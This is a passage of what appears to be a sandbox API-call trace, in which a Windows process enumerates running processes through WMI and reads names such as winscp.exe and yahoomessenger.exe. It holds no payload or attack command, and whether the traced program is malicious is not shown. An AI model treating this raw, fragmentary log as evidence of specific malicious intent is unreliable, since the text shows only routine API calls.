[3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0265.294] IUnknown:QueryInterface (in: This=0x552c698, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0265.294] IUnknown:AddRef (This=0x552c698) returned 0x3 [0265.295] IUnknown:QueryInterface (in: This=0x552c698, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0265.295] IUnknown:QueryInterface (in: This=0x552c698, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0265.295] IUnknown:QueryInterface (in: This=0x552c698, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x552c69c) returned 0x0 [0265.295] IMarshal:GetUnmarshalClass (in: This=0x552c69c, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0265.295] IUnknown:Release (This=0x552c69c) returned 0x3 [0265.295] IUnknown:QueryInterface (in: This=0x552c698, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0265.295] IUnknown:Release (This=0x552c698) returned 0x2 [0265.295] IUnknown:QueryInterface (in: This=0x552c698, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x552c698) returned 0x0 [0265.295] IUnknown:AddRef (This=0x552c698) returned 0x4 [0265.295] IUnknown:Release (This=0x552c698) returned 0x3 [0265.295] IUnknown:Release (This=0x552c698) returned 0x2 [0265.295] CoTaskMemFree (pv=0x54ba398) [0265.295] IUnknown:AddRef (This=0x552c698) returned 0x3 [0265.296] IWbemClassObject:Get (in: This=0x552c698, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0265.296] IWbemClassObject:Get (in: This=0x552c698, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4124\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0265.296] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4124\"") returned 0x5e [0265.296] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4124\"") returned 0x5e [0265.296] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0265.296] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0265.296] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0265.296] IUnknown:Release (This=0x601a94) returned 0x1 [0265.297] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba2d8) returned 0x0 [0265.297] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba2d8, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0265.297] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba2d8, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x5529c88) returned 0x0 [0265.297] WbemDefPath:IUnknown:Release (This=0x54ba2d8) returned 0x0 [0265.297] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529c88, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x5529c88) returned 0x0 [0265.298] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529c88, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0265.298] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529c88, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0265.298] WbemDefPath:IUnknown:AddRef (This=0x5529c88) returned 0x3 [0265.298] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529c88, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0265.298] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529c88, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0265.298] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529c88, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x5527e90) returned 0x0 [0265.298] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5527e90, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0265.298] WbemDefPath:IUnknown:Release (This=0x5527e90) returned 0x3 [0265.298] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529c88, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0265.299] WbemDefPath:IUnknown:Release (This=0x5529c88) returned 0x2 [0265.299] WbemDefPath:IUnknown:Release (This=0x5529c88) returned 0x1 [0265.299] WbemDefPath:IUnknown:QueryInterface (in: This=0x5529c88, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x5529c88) returned 0x0 [0265.299] WbemDefPath:IUnknown:AddRef (This=0x5529c88) returned 0x3 [0265.299] WbemDefPath:IUnknown:Release (This=0x5529c88) returned 0x2 [0265.299] WbemDefPath:IWbemPath:SetText (This=0x5529c88, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4124\"") returned 0x0 [0265.299] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0265.299] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0265.299] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.299] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0265.299] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0265.299] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.299] IWbemClassObject:Get (in: This=0x552c698, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23e132c*=0, plFlavor=0x23e1330*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="winscp.exe", varVal2=0x0), pType=0x23e132c*=8, plFlavor=0x23e1330*=0) returned 0x0 [0265.300] SysStringByteLen (bstr="winscp.exe") returned 0x14 [0265.300] SysStringByteLen (bstr="winscp.exe") returned 0x14 [0265.300] IWbemClassObject:Get (in: This=0x552c698, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23e132c*=8, plFlavor=0x23e1330*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="winscp.exe", varVal2=0x0), pType=0x23e132c*=8, plFlavor=0x23e1330*=0) returned 0x0 [0265.300] SysStringByteLen (bstr="winscp.exe") returned 0x14 [0265.300] SysStringByteLen (bstr="winscp.exe") returned 0x14 [0265.300] CoTaskMemAlloc (cb=0x4) returned 0x54ba2d8 [0265.307] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba2d8, puReturned=0x23c1fd0 | out: apObjects=0x54ba2d8*=0x552b378, puReturned=0x23c1fd0*=0x1) returned 0x0 [0265.309] IUnknown:QueryInterface (in: This=0x552b378, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x552b378) returned 0x0 [0265.310] IUnknown:QueryInterface (in: This=0x552b378, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0265.310] IUnknown:QueryInterface (in: This=0x552b378, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0265.310] IUnknown:QueryInterface (in: This=0x552b378, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0265.310] IUnknown:AddRef (This=0x552b378) returned 0x3 [0265.310] IUnknown:QueryInterface (in: This=0x552b378, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0265.310] IUnknown:QueryInterface (in: This=0x552b378, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0265.310] IUnknown:QueryInterface (in: This=0x552b378, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x552b37c) returned 0x0 [0265.310] IMarshal:GetUnmarshalClass (in: This=0x552b37c, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0265.310] IUnknown:Release (This=0x552b37c) returned 0x3 [0265.310] IUnknown:QueryInterface (in: This=0x552b378, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0265.311] IUnknown:Release (This=0x552b378) returned 0x2 [0265.311] IUnknown:QueryInterface (in: This=0x552b378, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x552b378) returned 0x0 [0265.311] IUnknown:AddRef (This=0x552b378) returned 0x4 [0265.311] IUnknown:Release (This=0x552b378) returned 0x3 [0265.311] IUnknown:Release (This=0x552b378) returned 0x2 [0265.311] CoTaskMemFree (pv=0x54ba2d8) [0265.311] IUnknown:AddRef (This=0x552b378) returned 0x3 [0265.311] IWbemClassObject:Get (in: This=0x552b378, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0265.311] IWbemClassObject:Get (in: This=0x552b378, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4132\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0265.311] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4132\"") returned 0x5e [0265.311] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4132\"") returned 0x5e [0265.311] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0265.311] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0265.311] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0265.311] IUnknown:Release (This=0x601a94) returned 0x1 [0265.313] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba2d8) returned 0x0 [0265.314] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba2d8, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0265.314] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba2d8, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x552a318) returned 0x0 [0265.314] WbemDefPath:IUnknown:Release (This=0x54ba2d8) returned 0x0 [0265.314] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a318, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x552a318) returned 0x0 [0265.314] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a318, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0265.314] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a318, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0265.314] WbemDefPath:IUnknown:AddRef (This=0x552a318) returned 0x3 [0265.314] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a318, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0265.314] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a318, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0265.314] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a318, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x5527e30) returned 0x0 [0265.314] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5527e30, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0265.314] WbemDefPath:IUnknown:Release (This=0x5527e30) returned 0x3 [0265.315] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a318, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0265.315] WbemDefPath:IUnknown:Release (This=0x552a318) returned 0x2 [0265.315] WbemDefPath:IUnknown:Release (This=0x552a318) returned 0x1 [0265.315] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a318, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x552a318) returned 0x0 [0265.315] WbemDefPath:IUnknown:AddRef (This=0x552a318) returned 0x3 [0265.315] WbemDefPath:IUnknown:Release (This=0x552a318) returned 0x2 [0265.315] WbemDefPath:IWbemPath:SetText (This=0x552a318, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4132\"") returned 0x0 [0265.322] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0265.322] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0265.322] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.322] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0265.322] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0265.322] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.322] IWbemClassObject:Get (in: This=0x552b378, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23e1bb8*=0, plFlavor=0x23e1bbc*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="yahoomessenger.exe", varVal2=0x0), pType=0x23e1bb8*=8, plFlavor=0x23e1bbc*=0) returned 0x0 [0265.322] SysStringByteLen (bstr="yahoomessenger.exe") returned 0x24 [0265.322] SysStringByteLen (bstr="yahoomessenger.exe") returned 0x24 [0265.322] IWbemClassObject:Get (in: This=0x552b378, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23e1bb8*=8, plFlavor=0x23e1bbc*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="yahoomessenger.exe", varVal2=0x0), pType=0x23e1bb8*=8, plFlavor=0x23e1bbc*=0) returned 0x0 [0265.322] SysStringByteLen (bstr="yahoomessenger.exe") returned 0x24 [0265.322] SysStringByteLen (bstr="yahoomessenger.exe") returned 0x24 [0265.323] CoTaskMemAlloc (cb=0x4) returned 0x54ba2d8 [0265.323] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba2d8, puReturned=0x23c1fd0 | out: apObjects=0x54ba2d8*=0x552b6a8, puReturned=0x23c1fd0*=0x1) returned 0x0 [0265.323] IUnknown:QueryInterface (in: 